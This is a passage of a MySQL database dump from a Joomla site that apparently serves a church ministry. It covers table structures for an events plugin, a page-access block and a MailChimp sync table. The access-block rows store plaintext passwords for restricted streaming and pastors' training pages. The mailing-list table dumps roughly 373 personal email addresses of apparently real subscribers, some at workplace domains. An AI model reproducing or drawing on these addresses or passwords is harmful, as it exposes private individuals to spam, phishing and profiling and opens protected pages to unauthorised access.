INSERT INTO `y57u5_jev_defaults` (`id`, `title`, `name`, `subject`, `value`, `state`, `params`, `language`, `catid`) VALUES
(1, 'JEV_EVENT_DETAIL_PAGE', 'icalevent.detail_body', '', '', 0, '', '*', 0),
(2, 'JEV_EVENT_LIST_ROW', 'icalevent.list_row', '', '', 0, '', '*', 0),
(3, 'JEV_EVENT_MONTH_CALENDAR_CELL', 'month.calendar_cell', '', '', 0, '', '*', 0),
(4, 'JEV_EVENT_MONTH_CALENDAR_TIP', 'month.calendar_tip', '', '', 0, '', '*', 0),
(5, 'JEV_EVENT_EDIT_PAGE', 'icalevent.edit_page', '', '', 0, '', '*', 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jev_users`
--

CREATE TABLE `y57u5_jev_users` (
  `id` int(11) UNSIGNED NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(2) NOT NULL DEFAULT '0',
  `canuploadimages` tinyint(2) NOT NULL DEFAULT '0',
  `canuploadmovies` tinyint(2) NOT NULL DEFAULT '0',
  `cancreate` tinyint(2) NOT NULL DEFAULT '0',
  `canedit` tinyint(2) NOT NULL DEFAULT '0',
  `canpublishown` tinyint(2) NOT NULL DEFAULT '0',
  `candeleteown` tinyint(2) NOT NULL DEFAULT '0',
  `canpublishall` tinyint(2) NOT NULL DEFAULT '0',
  `candeleteall` tinyint(2) NOT NULL DEFAULT '0',
  `cancreateown` tinyint(2) NOT NULL DEFAULT '0',
  `cancreateglobal` tinyint(2) NOT NULL DEFAULT '0',
  `eventslimit` int(11) NOT NULL DEFAULT '0',
  `extraslimit` int(11) NOT NULL DEFAULT '0',
  `categories` varchar(255) NOT NULL DEFAULT '',
  `calendars` varchar(255) NOT NULL DEFAULT '',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jlexblock`
--

CREATE TABLE `y57u5_jlexblock` (
  `id` int(11) UNSIGNED NOT NULL,
  `sef_link` varchar(200) NOT NULL,
  `list_var` varchar(255) NOT NULL,
  `mt_block` varchar(3) NOT NULL,
  `mt_value` text NOT NULL,
  `mt_switch` tinyint(1) NOT NULL DEFAULT '0',
  `mt_area` tinyint(1) NOT NULL,
  `mt_index` tinyint(1) NOT NULL DEFAULT '0',
  `mt_fullsite` tinyint(1) NOT NULL DEFAULT '0',
  `mt_path` varchar(255) DEFAULT NULL,
  `mt_tpl` varchar(20) DEFAULT NULL,
  `htmlBefore` text,
  `htmlBody` text,
  `htmlAfter` text,
  `itemid` varchar(5) DEFAULT NULL,
  `created` datetime NOT NULL,
  `modified` datetime DEFAULT NULL,
  `created_by` int(11) UNSIGNED NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `groupid` int(11) NOT NULL DEFAULT '0',
  `checkmore` text,
  `callbackfn` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jlexblock`
--

INSERT INTO `y57u5_jlexblock` (`id`, `sef_link`, `list_var`, `mt_block`, `mt_value`, `mt_switch`, `mt_area`, `mt_index`, `mt_fullsite`, `mt_path`, `mt_tpl`, `htmlBefore`, `htmlBody`, `htmlAfter`, `itemid`, `created`, `modified`, `created_by`, `published`, `groupid`, `checkmore`, `callbackfn`) VALUES
(19, 'private', 'id=125&option=com_content&view=article', 'pw', 'glory123!', 0, 2, 0, 0, NULL, 'default', '<h1>Restricted Streaming!</h1>', '', '', '1105', '2017-03-10 20:31:56', '2019-09-10 16:18:17', 196, 0, 0, '', ''),
(20, 'training', 'id=126&option=com_content&view=article', 'pw', 'pastorsmeetings', 0, 2, 0, 0, NULL, 'default', '<h1>Restricted Area! Please Login</h1>', '', '', '1106', '2017-03-24 20:08:25', '2019-09-01 13:47:34', 196, 1, 0, '', '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_joomailermailchimpintegration`
--

CREATE TABLE `y57u5_joomailermailchimpintegration` (
  `id` int(11) UNSIGNED NOT NULL,
  `userid` int(11) UNSIGNED NOT NULL,
  `email` varchar(50) NOT NULL,
  `listid` varchar(25) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_joomailermailchimpintegration`
--

INSERT INTO `y57u5_joomailermailchimpintegration` (`id`, `userid`, `email`, `listid`) VALUES
(1, 0, 'olowookeresegun@yahoo.com', 'cb9600c42e'),
(2, 0, 'richesofhisglory91@gmail.com', 'cb9600c42e'),
(3, 0, 'walexoneme@yahoo.com', 'cb9600c42e'),
(4, 0, 'morganae45@gmail.com', 'cb9600c42e'),
(5, 0, 'jeanayem@gmail.com', 'cb9600c42e'),
(6, 0, 'ezejids@gmail.com', 'cb9600c42e'),
(7, 0, 'pattyikota@gmail.com', 'cb9600c42e'),
(8, 0, 'angynyaga@gmail.com', 'cb9600c42e'),
(9, 0, 'kalupatiencelove@gmail.com', 'cb9600c42e'),
(10, 0, 'Michaeloladele75@gmail.com', 'cb9600c42e'),
(11, 0, 'olabanji_daniel@yahoo.com', 'cb9600c42e'),
(12, 0, 'oniabolanle@gmail.com', 'cb9600c42e'),
(13, 0, 'elibless67@gmail.com', 'cb9600c42e'),
(14, 0, 'enioduntanawoyemi@gmail.com', 'cb9600c42e'),
(15, 0, 'praisehill@outlook.com', 'cb9600c42e'),
(16, 0, 'awesarah73@gmail.com', 'cb9600c42e'),
(17, 0, 'papatea2013@live.com', 'cb9600c42e'),
(18, 0, 'blessedgreatnex@gmail.com', 'cb9600c42e'),
(19, 0, 'lojomevangelism@yahoo.com', 'cb9600c42e'),
(20, 0, 'joysetholadosu@yahoo.com', 'cb9600c42e'),
(21, 0, 'Millicent35@gmail.com', 'cb9600c42e'),
(22, 0, 'emmapeter@gmail.com', 'cb9600c42e'),
(23, 0, 'daramolasamuell@yahoo.com', 'cb9600c42e'),
(24, 0, 'Oloruntobaowoseeni@yahoo.com', 'cb9600c42e'),
(25, 0, 'systachet@gmail.com', 'cb9600c42e'),
(26, 0, 'peteola2002@yahoo.co.uk', 'cb9600c42e'),
(27, 0, 'aderetitayo001@gmail.com', 'cb9600c42e'),
(28, 0, 'theophilusdada@gmail.com', 'cb9600c42e'),
(29, 0, 'restoredgloryministries@gmail.com', 'cb9600c42e'),
(30, 0, 'popoolara2015@gmail.com', 'cb9600c42e'),
(31, 0, 'solosoloeze4life@gmail.com', 'cb9600c42e'),
(32, 0, 'irede4real@gmail.com', 'cb9600c42e'),
(33, 0, 'solaadenathmail@gmail.com', 'cb9600c42e'),
(34, 0, 'esther4dy@yahoo.com', 'cb9600c42e'),
(35, 0, 'obayanayodeji0016@gmail.com', 'cb9600c42e'),
(36, 0, 'teedee5782@yahoo.com', 'cb9600c42e'),
(37, 0, 'afronelly2002@yahoo.com', 'cb9600c42e'),
(38, 0, 'jegedetimothy1@gmail.com', 'cb9600c42e'),
(39, 0, 'marvelakin@gmail.com', 'cb9600c42e'),
(40, 0, 'm.opare@hotmail.co.uk', 'cb9600c42e'),
(41, 0, 'ddonolu@gmail.com', 'cb9600c42e'),
(42, 0, 'ulaw4u@gmail.com', 'cb9600c42e'),
(43, 0, 'justine.ehimen@zenithbank.com', 'cb9600c42e'),
(44, 0, 'oshioehimen@gmail.com', 'cb9600c42e'),
(45, 0, 'oguntoyeadeola123@gmail.com', 'cb9600c42e'),
(46, 0, 'Ozabro@yahoo.co.uk', 'cb9600c42e'),
(47, 0, 'ambrose4jesus@gmail.com', 'cb9600c42e'),
(48, 0, 'Janbunms@gmail.com', 'cb9600c42e'),
(49, 0, 'doveme2000@gmail.com', 'cb9600c42e'),
(50, 0, 'chijiokeobu100@gmail.com', 'cb9600c42e'),
(51, 0, 'sbidiakite@yahoo.com', 'cb9600c42e'),
(52, 0, 'enitosgloballink@gmail.com', 'cb9600c42e'),
(53, 0, 'albertbosun@gmail.com', 'cb9600c42e'),
(54, 0, 'Josichin@yahoo.com', 'cb9600c42e'),
(55, 0, 'olawoyingbemisola@gmail.com', 'cb9600c42e'),
(56, 0, 'banjiadewoye@live.com', 'cb9600c42e'),
(57, 0, 'adeoluemmanuel12@gmail.com', 'cb9600c42e'),
(58, 0, 'isaacolaniran@yahoo.com', 'cb9600c42e'),
(59, 0, 'Samuelolawoore005.sa@gmail.com', 'cb9600c42e'),
(60, 0, 'olawale.olaniran@zenithbank.com', 'cb9600c42e'),
(61, 0, 'segjamoy@yahoo.com', 'cb9600c42e'),
(62, 0, 'retekiye@yahoo.com', 'cb9600c42e'),
(63, 0, 'ademideji220@gmail.com', 'cb9600c42e'),
(64, 0, 'tdogun@gmail.com', 'cb9600c42e'),
(65, 0, 'akinagboola23@yahoo.com', 'cb9600c42e'),
(66, 0, 'mathewadedotun@gmail.com', 'cb9600c42e'),
(67, 0, 'ismruthtee@yahoo.com', 'cb9600c42e'),
(68, 0, 'ojoadeolue@gmail.com', 'cb9600c42e'),
(69, 0, 'bolatitokayode@gmail.com', 'cb9600c42e'),
(70, 0, 'evonneoyugi@yahoo.com', 'cb9600c42e'),
(71, 0, 'Wuranetics@yahoo.com', 'cb9600c42e'),
(72, 0, 'yinkamic270@yahoo.ca', 'cb9600c42e'),
(73, 0, 'davidoluwaseyia@gmail.com', 'cb9600c42e'),
(74, 0, 'ennydilon@yahoo.co.uk', 'cb9600c42e'),
(75, 0, 'cjkorie@yahoo.com', 'cb9600c42e'),
(76, 0, 'rindealabi@gmail.com', 'cb9600c42e'),
(77, 0, 'ojoemmanueltop88@gmail.com', 'cb9600c42e'),
(78, 0, 'O_bose@ymail.com', 'cb9600c42e'),
(79, 0, 'diojaneng@yahoo.com', 'cb9600c42e'),
(80, 0, 'daniel_akintola@yahoo.com', 'cb9600c42e'),
(81, 0, 'alobagbotemi01@gmail.com', 'cb9600c42e'),
(82, 0, 'ademolaadeniji@gmail.com', 'cb9600c42e'),
(83, 0, 'gelegah@yahoo.com', 'cb9600c42e'),
(84, 0, 'opeyemifadare@yahoo.com', 'cb9600c42e'),
(85, 0, 'gbemikode@gmail.com', 'cb9600c42e'),
(86, 0, 'ayomidevictor@yahoo.com', 'cb9600c42e'),
(87, 0, 'adedoyinajoke@gmail.com', 'cb9600c42e'),
(88, 0, 'ochukakikelomo@gmail.com', 'cb9600c42e'),
(89, 0, 'lydia_akanni@yahoo.com', 'cb9600c42e'),
(90, 0, 'adegboyegafabunmi@gmail.com', 'cb9600c42e'),
(91, 0, 'mayowadavid11@gmail.com', 'cb9600c42e'),
(92, 0, 'bisifashion@yahoo.com', 'cb9600c42e'),
(93, 0, 'oluwatobioladapo@gmail.com', 'cb9600c42e'),
(94, 0, 'Yinkapoju@hotmail.com', 'cb9600c42e'),
(95, 0, 'oyenikeolutayo@gmail.com', 'cb9600c42e'),
(96, 0, 'kafilat_oluwatoyin@yahoo.com', 'cb9600c42e'),
(97, 0, 'kingwale2@yahoo.com', 'cb9600c42e'),
(98, 0, 'ajayi4mii@yahoo.com', 'cb9600c42e'),
(99, 0, 'promisetomilayo@yahoo.com', 'cb9600c42e'),
(100, 0, 'oyi1st@yahoo.com', 'cb9600c42e'),
(101, 0, 'ajayivictor11@yahoo.com', 'cb9600c42e'),
(102, 0, 'olaniyi.helen.ho@gmail.com', 'cb9600c42e'),
(103, 0, 'Favouredvincent77@yahoo.com', 'cb9600c42e'),
(104, 0, 'chrixtieluv@gmail.com', 'cb9600c42e'),
(105, 0, 'akindelefelicia@gmail.com', 'cb9600c42e'),
(106, 0, 'ayodejiyusuff@gmail.com', 'cb9600c42e'),
(107, 0, 'Realacceptanceventures@gmail.com', 'cb9600c42e'),
(108, 0, 'hadassahgirl@gmail.com', 'cb9600c42e'),
(109, 0, 'austynrichie@gmail.com', 'cb9600c42e'),
(110, 0, 'Adeleyebabatundekayode@gmail.com', 'cb9600c42e'),
(111, 0, 'eniafelamo2002@yahoo.com', 'cb9600c42e'),
(112, 0, 'Mikeadeoti66@gmail.com', 'cb9600c42e'),
(113, 0, 'Michaelgbengacrown@gmail.com', 'cb9600c42e'),
(114, 0, 'Ranti_tella@yahoo.com', 'cb9600c42e'),
(115, 0, 'tsadosolomongodswill@gmail.com', 'cb9600c42e'),
(116, 0, 'ifchristb4me@gmail.com', 'cb9600c42e'),
(117, 0, 'obokoh@gmail.com', 'cb9600c42e'),
(118, 0, 'Oguntoyeblessing@yahoo.com', 'cb9600c42e'),
(119, 0, 'degnanboya@gmail.com', 'cb9600c42e'),
(120, 0, 'gaajets@gmail.com', 'cb9600c42e'),
(121, 0, 'macsteve107@gmail.com', 'cb9600c42e'),
(122, 0, 'fadaabraham@yahoo.com', 'cb9600c42e'),
(123, 0, 'lizzydoyin@yahoo.com', 'cb9600c42e'),
(124, 0, 'feelmeken45@gmail.com', 'cb9600c42e'),
(125, 0, 'mylifeforsuccess@gmail.com', 'cb9600c42e'),
(126, 0, 'segunadeleke37@gmail.com', 'cb9600c42e'),
(127, 0, 'olanjus2016@yahoo.com', 'cb9600c42e'),
(128, 0, 'engineerb4real@gmail.com', 'cb9600c42e'),
(129, 0, 'ademolajoseph26@gmail.com', 'cb9600c42e'),
(130, 0, 'isbrightsamuel@gmail.com', 'cb9600c42e'),
(131, 0, 'adebayo.fk@gmail.com', 'cb9600c42e'),
(132, 0, 'bukkyjulius@gmail.com', 'cb9600c42e'),
(133, 0, 'carolnyaseda@gmail.com', 'cb9600c42e'),
(134, 0, 'busayofatoke@yahoo.com', 'cb9600c42e'),
(135, 0, 'temmydamzeal@yahoo.com', 'cb9600c42e'),
(136, 0, 'Abimbolao201@gmail.com', 'cb9600c42e'),
(137, 0, 'oyinodubade@gmail.com', 'cb9600c42e'),
(138, 0, 'olugbengajohn60@gmail.com', 'cb9600c42e'),
(139, 0, 'Ogsolomon@yahoo.com', 'cb9600c42e'),
(140, 0, 'owoadeadeola77@gmail.com', 'cb9600c42e'),
(141, 0, 'olaoluelusanmi@gmail.com', 'cb9600c42e'),
(142, 0, 'oyedolar2000@yahoo.com', 'cb9600c42e'),
(143, 0, 'okoye_obianuju@yahoo.com', 'cb9600c42e'),
(144, 0, 'ayeyemimorolake10@gmail.com', 'cb9600c42e'),
(145, 0, 'tunmise079@gmail.com', 'cb9600c42e'),
(146, 0, 'achemuemmanuel@gmail.com', 'cb9600c42e'),
(147, 0, 'Perez.ajet@outlook.com', 'cb9600c42e'),
(148, 0, 'goodnessolatunji@gmail.com', 'cb9600c42e'),
(149, 0, 'oluwayemitheresa@yahoo.com', 'cb9600c42e'),
(150, 0, 'abundantoverflowsolutions@gmail.com', 'cb9600c42e'),
(151, 0, 'matthewolu@gmail.com', 'cb9600c42e'),
(152, 0, 'helenessiensamuel@gmail.com', 'cb9600c42e'),
(153, 0, 'ioak2@yahoo.com', 'cb9600c42e'),
(154, 0, 'Obawomiyeblessing1@gmail.com', 'cb9600c42e'),
(155, 0, 'Anointeddoutavzion@yahoo.com', 'cb9600c42e'),
(156, 0, 'Madedejisamuel@gmail.com', 'cb9600c42e'),
(157, 0, 'pstdosuoladipo@yahoo.com', 'cb9600c42e'),
(158, 0, 'Ajefumary@gmail.com', 'cb9600c42e'),
(159, 0, 'adefehintipatrick@gmail.com', 'cb9600c42e'),
(160, 0, 'ayodeleemman04@gmail.com', 'cb9600c42e'),
(161, 0, 'sdodunayo@gmail.com', 'cb9600c42e'),
(162, 0, 'babsgrace2015@gmail.com', 'cb9600c42e'),
(163, 0, 'ssheunfunmee@yahoo.com', 'cb9600c42e'),
(164, 0, 'fatunbi.abiodun@gmail.com', 'cb9600c42e'),
(165, 0, 'johntades1@yahoo.com', 'cb9600c42e'),
(166, 0, 'yewandei@yahoo.com', 'cb9600c42e'),
(167, 0, 'stephenebelomo@gmail.com', 'cb9600c42e'),
(168, 0, 'agadekoya@gmail.com', 'cb9600c42e'),
(169, 0, 'soncteewhy92@yahoo.com', 'cb9600c42e'),
(170, 0, 'ebenezerdubai@gmail.com', 'cb9600c42e'),
(171, 0, 'tsolubadewo@yahoo.com', 'cb9600c42e'),
(172, 0, 'tunbosunsol@gmail.com', 'cb9600c42e'),
(173, 0, 'topeawofeko@gmail.com', 'cb9600c42e'),
(174, 0, 'Dadataiwo50@gmail.com', 'cb9600c42e'),
(175, 0, 'marytemmy3@gmail.com', 'cb9600c42e'),
(176, 0, 'temitopebolatito21@gmail.com', 'cb9600c42e'),
(177, 0, 'seyi4jesu@gmail.com', 'cb9600c42e'),
(178, 0, 'olayemiajidasile@gmail.com', 'cb9600c42e'),
(179, 0, 'petseyi330@gmail.com', 'cb9600c42e'),
(180, 0, 'sokoyago@yahoo.com', 'cb9600c42e'),
(181, 0, 'idonurture@gmail.com', 'cb9600c42e'),
(182, 0, 'simonjackson005@gmail.com', 'cb9600c42e'),
(183, 0, 'gbeminiyi00@yahoo.com', 'cb9600c42e'),
(184, 0, 'israeldaniel@icloud.com', 'cb9600c42e'),
(185, 0, 'arowolooluwaseun@gmail.com', 'cb9600c42e'),
(186, 0, 'bukkylizzy1212@gmail.com', 'cb9600c42e'),
(187, 0, 'linuspaul007@yahoo.com', 'cb9600c42e'),
(188, 0, 'kemisoye77@yahoo.com', 'cb9600c42e'),
(189, 0, 'awillofgod@gmail.com', 'cb9600c42e'),
(190, 0, 'temydayo@gmail.com', 'cb9600c42e'),
(191, 0, 'famojuroyemisi@gmail.com', 'cb9600c42e'),
(192, 0, 'Buskyadigs@yahoo.com', 'cb9600c42e'),
(193, 0, 'Susanpj2010@yahoo.com', 'cb9600c42e'),
(194, 0, 'adeolapase@yahoo.com', 'cb9600c42e'),
(195, 0, 'youngmike13579@gmail.com', 'cb9600c42e'),
(196, 0, 'gakinkunmi@gmail.com', 'cb9600c42e'),
(197, 0, 'nkemndukwu77@gmail.com', 'cb9600c42e'),
(198, 0, 'akingbenga4him@gmail.com', 'cb9600c42e'),
(199, 0, 'oeno2k2@yahoo.com', 'cb9600c42e'),
(200, 0, 'lanreadediran@gmail.com', 'cb9600c42e'),
(201, 0, 'fexeucsam@yahoo.com', 'cb9600c42e'),
(202, 0, 'larabebeyi@yahoo.com', 'cb9600c42e'),
(203, 0, 'ilufoye.glory@gmail.com', 'cb9600c42e'),
(204, 0, 'rehobothstitches@gmail.com', 'cb9600c42e'),
(205, 0, 'rehobothstiches@gmail.com', 'cb9600c42e'),
(206, 0, 'Oakinlade@yahoo.co.uk', 'cb9600c42e'),
(207, 0, 'thelibertycentre@gmail.com', 'cb9600c42e'),
(208, 0, 'mayoriches@gmail.com', 'cb9600c42e'),
(209, 0, 'adeayomayowa@yahoo.com', 'cb9600c42e'),
(210, 0, 'akin4labi@yahoo.co.uk', 'cb9600c42e'),
(211, 0, 'jafabey@gmail.com', 'cb9600c42e'),
(212, 0, 'coobed51@hotmail.com', 'cb9600c42e'),
(213, 0, 'joeolusegun008@yahoo.com', 'cb9600c42e'),
(214, 0, 'rtorpeh@yahoo.com', 'cb9600c42e'),
(215, 0, 'sunnybbabs@yahoo.com', 'cb9600c42e'),
(216, 0, 'Adewuyisamuel5@gmail.com', 'cb9600c42e'),
(217, 0, 'Mathaidi@gmail.com', 'cb9600c42e'),
(218, 0, 'coleolawale@gmail.com', 'cb9600c42e'),
(219, 0, 'adebolola@mtnnigeria.net', 'cb9600c42e'),
(220, 0, 'samgbg81@gmail.com', 'cb9600c42e'),
(221, 0, 'tobafagbemi2015@gmail.com', 'cb9600c42e'),
(222, 0, 'tofeo2000@yahoo.com', 'cb9600c42e'),
(223, 0, 'beejohnson@outlook.com', 'cb9600c42e'),
(224, 0, 'yislekan@gmail.com', 'cb9600c42e'),
(225, 0, 'taiwograce43@gmail.com', 'cb9600c42e'),
(226, 0, 'faithwithworksentp@gmail.com', 'cb9600c42e'),
(227, 0, 'Holarsunkanmi93@gmail.com', 'cb9600c42e'),
(228, 0, 'gbenroadekunledavid@gmail.com', 'cb9600c42e'),
(229, 0, 'gracedamioreofe@gmail.com', 'cb9600c42e'),
(230, 0, 'ozurigbol@gmail.com', 'cb9600c42e'),
(231, 0, 'gloriaamadi2013@gmail.com', 'cb9600c42e'),
(232, 0, 'peter.babalola@dreamlabs.com.ng', 'cb9600c42e'),
(233, 0, 'omownmiadewara@gmail.com', 'cb9600c42e'),
(234, 0, 'zachariah_jiya@yahoo.com', 'cb9600c42e'),
(235, 0, 'adedejisolape@gmail.com', 'cb9600c42e'),
(236, 0, 'olutayo_kayode@yahoo.com', 'cb9600c42e'),
(237, 0, 'Israel_Ademola@hotmail.com', 'cb9600c42e'),
(238, 0, 'ramongerard147@gmail.com', 'cb9600c42e'),
(239, 0, 'Divinedestiny69@yahoo.com', 'cb9600c42e'),
(240, 0, 'tollyb29@gmail.com', 'cb9600c42e'),
(241, 0, 'Jamesoshogbo@yahoo.com', 'cb9600c42e'),
(242, 0, 'payanbamiji@gmail.com', 'cb9600c42e'),
(243, 0, 'maladetuyi@gmail.com', 'cb9600c42e'),
(244, 0, 'olugbengaajadi1@gmail.com', 'cb9600c42e'),
(245, 0, 'buksyem@yahoo.com', 'cb9600c42e'),
(246, 0, 'suleoluwaseun@gmail.com', 'cb9600c42e'),
(247, 0, 'bisidotun@yahoo.com', 'cb9600c42e'),
(248, 0, 'olalekanyemi1@gmail.com', 'cb9600c42e'),
(249, 0, 'doctorbello23@yahoo.com', 'cb9600c42e'),
(250, 0, 'samakworld@gmail.com', 'cb9600c42e'),
(251, 0, 'chisomike11@gmail.com', 'cb9600c42e'),
(252, 0, 'sunnyatoms@icloud.com', 'cb9600c42e'),
(253, 0, 'Adesiyantimi@gmail.com', 'cb9600c42e'),
(254, 0, 'faithayobola@gmail.com', 'cb9600c42e'),
(255, 0, 'ogunleyeemmanuel@yahoo.com', 'cb9600c42e'),
(256, 0, 'judeantem@gmail.com', 'cb9600c42e'),
(257, 0, 'alooluwagbenga@gmail.com', 'cb9600c42e'),
(258, 0, 'bernicelemo@gmail.com', 'cb9600c42e'),
(259, 0, 'aderemigbadero@gmail.com', 'cb9600c42e'),
(260, 0, 'Yhourmie@gmail.com', 'cb9600c42e'),
(261, 0, 'gulfoptions78@gmail.com', 'cb9600c42e'),
(262, 0, 'adehmorlah@outlook.com', 'cb9600c42e'),
(263, 0, 'mosunmolaakintundemi@gmail.com', 'cb9600c42e'),
(264, 0, 'dnwaemeke@gyail.com', 'cb9600c42e'),
(265, 0, 'colonel451@gmail.com', 'cb9600c42e'),
(266, 0, 'tgadewole@student.lautech.edu.ng', 'cb9600c42e'),
(267, 0, 'Stainlex@yahoo.com', 'cb9600c42e'),
(268, 0, 'Toksokuboyejo@yahoo.com', 'cb9600c42e'),
(269, 0, 'felasojikesh@yahoo.co.uk', 'cb9600c42e'),
(270, 0, 'nanmantongkam@live.com', 'cb9600c42e'),
(271, 0, 'Oluf_75@yahoo.com', 'cb9600c42e'),
(272, 0, 'mayoksal.sd@gmail.com', 'cb9600c42e'),
(273, 0, 'durus4u32@yahoo.com', 'cb9600c42e'),
(274, 0, 'mailstorejames@yahoo.com', 'cb9600c42e'),
(275, 0, 'Lmdriggers@hotmail.com', 'cb9600c42e'),
(276, 0, 'karfeshalom@gmail.com', 'cb9600c42e'),
(277, 0, 'abojakltd@yahoo.com', 'cb9600c42e'),
(278, 0, 'Graceowoeye1@gmail.com', 'cb9600c42e'),
(279, 0, 'dogbajalerobert@gmail.com', 'cb9600c42e'),
(280, 0, 'afuslaw@gmail.com', 'cb9600c42e'),
(281, 0, 'olusola.akinsanmi@yahoo.com', 'cb9600c42e'),
(282, 0, 'pettersonlaw@gmail.com', 'cb9600c42e'),
(283, 0, 'soadewoye@yahoo.com', 'cb9600c42e'),
(284, 0, 'beauty4praise@gmail.com', 'cb9600c42e'),
(285, 0, 'Subusola70@yahoo.com', 'cb9600c42e'),
(286, 0, 'michaelbenibayede@gmail.com', 'cb9600c42e'),
(287, 0, 'kaysonajude@yahoo.com', 'cb9600c42e'),
(288, 0, 'josheeti@gmail.com', 'cb9600c42e'),
(289, 0, 'funkey2405@gmail.com', 'cb9600c42e'),
(290, 0, 'efjoseph40@gmail.com', 'cb9600c42e'),
(291, 0, 'maggijoke@gmail.com', 'cb9600c42e'),
(292, 0, 'sammybanky88@gmail.com', 'cb9600c42e'),
(293, 0, 'adekemiagunbiade@gmail.com', 'cb9600c42e'),
(294, 0, 'adekemiagunbiade@yahoo.com', 'cb9600c42e'),
(295, 0, 'obayemiy@gmail.com', 'cb9600c42e'),
(296, 0, 'akennyjos@gmail.com', 'cb9600c42e'),
(297, 0, 'samoluwayemi@gmail.com', 'cb9600c42e'),
(298, 0, 'josiah9158@gmail.com', 'cb9600c42e'),
(299, 0, 'odewuyimicheal@yahoo.com', 'cb9600c42e'),
(300, 0, 'jitelewis1985@gmail.com', 'cb9600c42e'),
(301, 0, 'shatuene@yahoo.com', 'cb9600c42e'),
(302, 0, 'courage.enamudu@yahoo.com', 'cb9600c42e'),
(303, 0, 'yinkaomolohunnu5@gmail.com', 'cb9600c42e'),
(304, 0, 'olanetcom@gmail.com', 'cb9600c42e'),
(305, 0, 'oladipeoluwole@yahoo.com', 'cb9600c42e'),
(306, 0, 'oakinlotan@ymail.com', 'cb9600c42e'),
(307, 0, 'princessfunke112@yahoo.com', 'cb9600c42e'),
(308, 0, 'smkmlf@yahoo.com', 'cb9600c42e'),
(309, 0, 'amosgana76@gmail.com', 'cb9600c42e'),
(310, 0, 'olanipekunfisayo1@gmail.com', 'cb9600c42e'),
(311, 0, 'ambroise.touvet@gmail.com', 'cb9600c42e'),
(312, 0, 'eolutoki@gmail.com', 'cb9600c42e'),
(313, 0, 'akinskemmy@gmail.com', 'cb9600c42e'),
(314, 0, 'doyrem@hotmail.com', 'cb9600c42e'),
(315, 0, 'chuks7j@yahoo.com', 'cb9600c42e'),
(316, 0, 'Oyedokun.john@yahoo.com', 'cb9600c42e'),
(317, 0, 'osedipeolabisi@yahoo.com', 'cb9600c42e'),
(318, 0, 'greatsimeon@gmail.com', 'cb9600c42e'),
(319, 0, 'danielakintola@gmail.com', 'cb9600c42e'),
(320, 0, 'prof-sam@naij.com', 'cb9600c42e'),
(321, 0, 'oktexeng@yahoo.com', 'cb9600c42e'),
(322, 0, 'comfortajani445@gmail.com', 'cb9600c42e'),
(323, 0, 'ayopaul111@gmail.com', 'cb9600c42e'),
(324, 0, 'primusdavid@yahoo.com', 'cb9600c42e'),
(325, 0, 'sanmiakindipe@gmail.com', 'cb9600c42e'),
(326, 0, 'tayefatimehin@yahoo.co.uj', 'cb9600c42e'),
(327, 0, 'Badefeye@gmail.com', 'cb9600c42e'),
(328, 0, 'soji.oloyede@yahoo.com', 'cb9600c42e'),
(329, 0, 'oladotunsam2015@gmail.com', 'cb9600c42e'),
(330, 0, 'akinyemiibukun@yahoo.com', 'cb9600c42e'),
(331, 0, 'musabyaroson@yahoo.com', 'cb9600c42e'),
(332, 0, 'ibosiolav@gmail.com', 'cb9600c42e'),
(333, 0, 'dipo1@hotmail.co.uk', 'cb9600c42e'),
(334, 0, 'lovettoghwere@gmail.com', 'cb9600c42e'),
(335, 0, 'cizifoods@gmail.com', 'cb9600c42e'),
(336, 0, 'lacresia219@gmail.com', 'cb9600c42e'),
(337, 0, 'funkyoluwaseun@gmail.com', 'cb9600c42e'),
(338, 0, 'adenikeanyang@yahoo.com', 'cb9600c42e'),
(339, 0, 'edmundchinedu64@gmail.com', 'cb9600c42e'),
(340, 0, 'ojoopatunji@gmail.com', 'cb9600c42e'),
(341, 0, 'tekpebimoh@gmail.com', 'cb9600c42e'),
(342, 0, 'aesthermodupe@yahoo.com', 'cb9600c42e'),
(343, 0, 'khennyunique@gmail.com', 'cb9600c42e'),
(344, 0, 'eaadeyemi01@gmail.com', 'cb9600c42e'),
(345, 0, 'temitopeolatubosun@gmail.com', 'cb9600c42e'),
(346, 0, 'fadipevictoria@gmail.com', 'cb9600c42e'),
(347, 0, 'maduprecious288@gmail.com', 'cb9600c42e'),
(348, 0, 'topowo2002@yahoo.com', 'cb9600c42e'),
(349, 0, 'muniruoloruntobi@gmail.com', 'cb9600c42e'),
(350, 0, 'samuel.oluodo@creseada.com', 'cb9600c42e'),
(351, 0, 'samueldare57@gmail.com', 'cb9600c42e'),
(352, 0, 'samueldare576@gmail.com', 'cb9600c42e'),
(353, 0, 'dakas295@gmail.com', 'cb9600c42e'),
(354, 0, 'johnoluwatosin878@gmail.com', 'cb9600c42e'),
(355, 0, 'gbemkem82@gmail.com', 'cb9600c42e'),
(356, 0, 'gbekem82@gmail.com', 'cb9600c42e'),
(357, 0, 'adelekeadebanjoo@gmail.com', 'cb9600c42e'),
(358, 0, 'funkyobat@gmail.com', 'cb9600c42e'),
(359, 0, 'sundaykolawole10@gmail.com', 'cb9600c42e'),
(360, 0, 'kizzostic@yahoo.com', 'cb9600c42e'),
(361, 0, 'pastorndifrekeokoneffiong@gmail.com', 'cb9600c42e'),
(362, 0, 'adesegunpaul@gmail.com', 'cb9600c42e'),
(363, 0, 'kbolanle@gmail.com', 'cb9600c42e'),
(364, 0, 'tokunlola2016@gmail.com', 'cb9600c42e'),
(365, 0, 'alexban4jesus@gmail.com', 'cb9600c42e'),
(366, 0, 'oyeyemiflorence@rocketmail.com', 'cb9600c42e'),
(367, 0, 'vtgkenny@gmail.com', 'cb9600c42e'),
(368, 0, 'Yemmymide@gmail.com', 'cb9600c42e'),
(369, 0, 'elisha.akinremi@gmail.com', 'cb9600c42e'),
(370, 0, 'ndukwearuakalu@gmail.com', 'cb9600c42e'),
(371, 0, 'mercy2014@gmail.com', 'cb9600c42e'),
(372, 0, 'oluwadamilola.ojo@elizadeuniversity.edu.ng', 'cb9600c42e'),
(373, 0, 'reubenogah@gmail.com', 'cb9600c42e'),
